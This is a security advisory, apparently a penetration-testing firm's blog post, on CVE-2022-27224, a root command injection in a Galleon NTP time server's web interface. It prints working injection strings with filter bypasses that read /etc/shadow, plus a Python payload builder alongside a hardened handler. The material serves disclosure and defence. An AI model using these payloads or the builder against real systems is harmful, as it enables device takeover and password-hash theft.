Galleon Systems’ NTS-6002-GPS, a GPS-referenced NTP time server, had a command injection vulnerability in its firmware that allows total control of the device through the web management interface.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27224
A vulnerability was discovered in Galleon NTS-6002-GPS 4.14.103-Galleon-NTS-6002.V12 #4. A low-privilege authenticated attacker can perform command injection as the root user by supplying shell metacharacters to forms in the Network Tools section of the web management interface. All three networking tools are affected (Ping, Traceroute and DNS Lookup), via their respective input fields (ping_address, trace_address and nslookup_address).
In the examples below we target one of the three vulnerable pages, DNS Lookup. The vulnerable endpoint is “/tools/dolookup” and the parameter is “nslookup_address”.
Example inputs used to enumerate and exploit the command injection through the pages and parameters listed above (“buffer” is an arbitrary placeholder for the hostname the form expects; the “&” that follows it ends that argument and starts a new command, so whatever comes after the “&” runs regardless of what the lookup itself does):
buffer&id;
buffer&id&whoami&ifconfig;
buffer&id&pwd&ls;
The underlying system did not allow some characters to be passed; these restrictions can be worked around using shell facilities. Spaces can be avoided by using the IFS shell variable (Internal Field Separator): by default it contains space, tab and newline, so an unquoted ${IFS} expands to whitespace that the shell then uses to split the command line into words:
buffer&cat${IFS}index.php
Forward slashes “/” were also not accepted. In bash these can be reproduced with substring expansion, such as ${HOME:0:1}, which extracts the first character of the HOME variable; because HOME holds an absolute path, that character is “/”. Any other variable known to hold an absolute path (PATH, for example) would serve equally well, and the trick fails if the chosen variable is unset or empty, since the expansion is then empty rather than “/”. With these substitutions we can submit most shell commands, such as:
buffer&cat${IFS}${HOME:0:1}etc${HOME:0:1}passwd
buffer&cat${IFS}${HOME:0:1}etc${HOME:0:1}shadow
The final injection string reads the local Unix system's password hash file, /etc/shadow. That file is only readable with “root” privileges on the device, so retrieving it highlights a second issue: the web management UI server runs as the “root” administrative account rather than a dedicated low-privilege account such as “www-data” or “apache”.
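To make the two bypasses concrete, here is an added example (not code from the original post or from Galleon). It models the device-side character filter as the post describes it (rejecting space and “/”; the real filter is not published, so that set is an assumption), builds the payload for an arbitrary command the same way the strings above were built, models the two bash expansions the payload relies on, and shows the hardened form of the lookup handler for comparison. The `vulnerable_command_line` sink is hypothetical: the post does not show the device's source, it only shows that user input reaches a root shell.

```python
import re

# Characters the post says the lookup field rejected.
# Assumption: the device's real filter is unknown; these are the two the post names.
BLOCKED_CHARS = " /"

# Placeholder hostname the form expects; "&" ends it and starts the injected command.
PREFIX = "buffer&"


def filter_accepts(field):
    """Model of the device-side character filter described in the post."""
    return not any(c in field for c in BLOCKED_CHARS)


def build_payload(command):
    """Rewrite a command so it contains no space or slash, as the post does."""
    encoded = command.replace("/", "${HOME:0:1}").replace(" ", "${IFS}")
    return PREFIX + encoded


# ${NAME} and ${NAME:offset:length} are the only expansions the payload needs.
_PARAM_RE = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)(?::(\d+):(\d+))?\}")


def bash_expand(text, env):
    """Minimal model of bash parameter expansion for the two forms above.
    An unset variable expands to the empty string, exactly as in bash, which
    is why the slash trick depends on HOME (or another absolute path) being set."""
    def sub(m):
        value = env.get(m.group(1), "")
        if m.group(2) is not None:
            start = int(m.group(2))
            return value[start:start + int(m.group(3))]
        return value
    return _PARAM_RE.sub(sub, text)


def vulnerable_command_line(addr):
    """Hypothetical sink: the string a system()/shell=True call hands to `sh -c`.
    Whatever the shell metacharacters in addr mean, the shell will honour them."""
    return "nslookup " + addr


# Allow-list for a DNS lookup target: dotted labels of letters, digits and "-",
# no label starting with "-" (which would also block option injection).
_HOSTNAME_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(\.(?!-)[A-Za-z0-9-]{1,63})*\.?")


def safe_lookup_argv(addr):
    """Hardened form: validate against the allow-list and build an argv list to
    run with subprocess.run(argv, shell=False), so no shell ever parses the input."""
    if len(addr) > 253 or not _HOSTNAME_RE.fullmatch(addr):
        raise ValueError("rejected lookup target: %r" % addr)
    return ["nslookup", addr]


if __name__ == "__main__":
    # Constructed environment standing in for the web server's shell. Real bash
    # IFS is space+tab+newline, but word splitting collapses it to one separator,
    # so a single space models the effect.
    env = {"HOME": "/root", "IFS": " "}
    payload = build_payload("cat /etc/shadow")
    print(payload)
    print(filter_accepts(payload), filter_accepts("cat /etc/shadow"))
    print(bash_expand(vulnerable_command_line(payload), env))
    print(safe_lookup_argv("time.example.com"))
    try:
        safe_lookup_argv(payload)
    except ValueError as err:
        print(err)
```

Running it shows the submitted string passing the modelled filter while the plain command does not, and the shell-expanded command line reading `nslookup buffer&cat /etc/shadow`; with HOME missing from the environment the same payload expands to `cat etcshadow`, which is the failure mode to expect on a service started with a bare environment. The hardened handler rejects the payload outright and never hands user input to a shell.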
I found the vulnerability almost accidentally while doing other work. Wanting a change of focus I explored the web admin UI looking for basic vulnerabilities. Much to my surprise I found this device to be vulnerable.
Command injection on a GPS-powered NTP device could in theory be quite devastating. Once “root”-level command execution is gained, an attacker controls the time the device serves to the network. Kerberos rejects authentication when the clock skew between a client and the KDC exceeds its configured tolerance (five minutes by default), so corrupting the network's time source can break authentication across a domain. This would be compounded if no backup NTP source is available.
The compromised device could be turned into a persistent network backdoor for the attacker, or used to disrupt SCADA / ICS systems that rely on accurate time. Beyond that it is down to the attacker's creativity. If you are lucky, they might just exfiltrate the “root” account's password hash from /etc/shadow, crack it offline and spray the network hoping to find password re-use.
At the time of writing the vendor was working on releasing a newer iteration of the device's software which would patch the identified security issues. However, it has not yet been released, and to the best of our knowledge the update has not been tested or verified.
The vendor attempted to deny that the webserver was running with "root" privileges. Here’s what they said to us:
This had us falling about laughing!
We disproved this crazy statement. There are two indications that the web server was indeed running as the superuser “root”. Most importantly, the output of the injected “id” command showed a UID of 0, which on Unix-like systems always identifies the superuser, i.e. the “root” user.
Furthermore, as seen in the screenshots above, it was possible to retrieve the “/etc/shadow” hash file, which is normally readable only by the “root” account or by a process that has been granted root privileges (e.g. via a SUID binary). A web server process that can read it is running with root's rights, whatever account name the vendor believes it uses.
The post Galleon NTS-6002-GPS Command Injection vulnerability (CVE-2022-27224) first appeared on Pen Test Partners.